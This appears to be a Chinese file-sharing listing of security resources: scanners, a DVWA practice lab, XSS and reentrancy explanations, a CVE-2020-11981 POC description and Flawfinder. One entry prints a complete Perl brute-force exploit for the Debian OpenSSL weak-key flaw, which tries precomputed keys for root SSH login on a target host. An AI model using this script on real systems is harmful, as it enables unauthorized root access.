基于lstm的poc漏洞扫描检测,内含数据集以及源码可以作为预研demo
2022-12-19 17:00:36 53KB scannner lstm 漏洞扫描
Mang0-php文件包含漏洞
2022-12-18 21:25:04 851KB 安全攻防
1
“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。”
2022-12-18 21:15:07 1.62MB 安全漏洞 xxs
1
网络和安全漏洞扫描工具,Nessus-8.1.0-x64软件工具离线安装包,可识别联网资产上的一切漏洞、错误配置和恶意软件,通过高级分析、可自定义的仪表板/报告和工作流来识别其中的薄弱环节
2022-12-18 17:28:18 172.13MB tenable 漏洞扫描 离线安装包
1
DVMA-渗透测试漏洞练习平台, 其中内含XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等各个难度的测试环境
2022-12-17 18:51:26 1.29MB 漏洞测试
1
文章目录一、拍卖合约二、收款地址未定义fallback函数的问题fallback问题的解决方案三、重入攻击(Re-entrancy Attack)的问题重入攻击的解决方案 一、拍卖合约 智能合约定义成员变量、event等,构造函数初始化受益人、拍卖结束时间,如下所示: 出价的函数如下,标注payable说明函数可以接收转账,require(now <= auctionEnd)检查拍卖是否结束,如果已经结束就抛出异常,然后检查出价是否大于最高出价,然后将出价人记录到bidders数组(因为bids哈希表不支持遍历),然后记录新的最高出价人,记录日志,如下所示: 结束拍卖的函数如下,首先检查拍
2022-12-12 09:17:05 471KB 以太坊 智能合约 漏洞
1
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来管理任务流程的任务调度工具, 不需要知道业务数据的具体内容,设置任务的依赖关系即可实现任务调度。 这个平台拥有和 Hive、Presto、MySQL、HDFS、Postgres 等数据源之间交互的能力,并且提供了钩子(hook)使其拥有很好地扩展性。除了一个命令行界面,该工具还提供了一个基于 Web 的用户界面可以可视化管道的依赖关系、监控进度、触发任务等。 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。
1
1.订单需要多重效验,如下图所演示 2.订单数值较大时需要人工审核订单信息,如下图所演示 3.我只是提到两个非常简单的预防思路,第二个甚至还有一些不足之处 1.
2022-12-08 20:50:56 1.56MB Web安全测试中常见逻辑漏洞解析
1
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit 解开Debian OpenSSL内的ssh钥匙只有65.536可能性,导致唯一的熵是引起钥匙的过程的Pid. 这导致以下perl脚本程序可以使用与暴力的预先计算好的ssh钥匙。如果钥匙在一个非被修补的debian或其他系统指南被安装配置,它就会运作。 在一个未修补的系统中,不需要Debian,做以下工作: keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/ 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 2. 提取它对应目录 3. 输入/root/.ssh/authorized_keys与2048位的SSH RSA钥匙,引起在Upatched Debian (这是这盘剥将增殖比的钥匙 eak) 4. 运行perl脚本程序并且给它提取bzip2的位置. CODE: #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n"; print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n"; print "By hack01[at]live[dot]cn\n"; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die("opendir"); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) > $keysPerConnect) { system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]); @a = (); } } 5. 在几分钟(少于20分钟)以后享受胜利结果吧!
2022-12-05 15:02:46 47.9MB 漏洞复现
1
关于 这是“探伤者”。 Flawfinder 是一个简单的程序,可以扫描 C/C++ 源代码并报告潜在的安全漏洞。 它可以是检查软件漏洞的有用工具,也可以更广泛地作为对静态源代码分析工具的简单介绍。 它的设计易于安装和使用。 Flawfinder 支持 Common Weakness Enumeration (CWE) 并正式与 CWE 兼容。 有关更多信息,请参阅 平台 Flawfinder 旨在作为命令行工具在 Unix/Linux/POSIX 系统(包括 Cygwin、基于 Linux 的系统、MacOS 和各种 BSD)上使用。 它需要 Python 2.7 或 Python 3。 安装 如果你只是想使用它,你可以使用 Python 的“pip”或系统的包管理器(flawfinder 有许多系统的包)安装缺陷查找器。 它还支持按照通常的make install源安装约定轻松安装
2022-12-04 12:28:49 112KB Python
1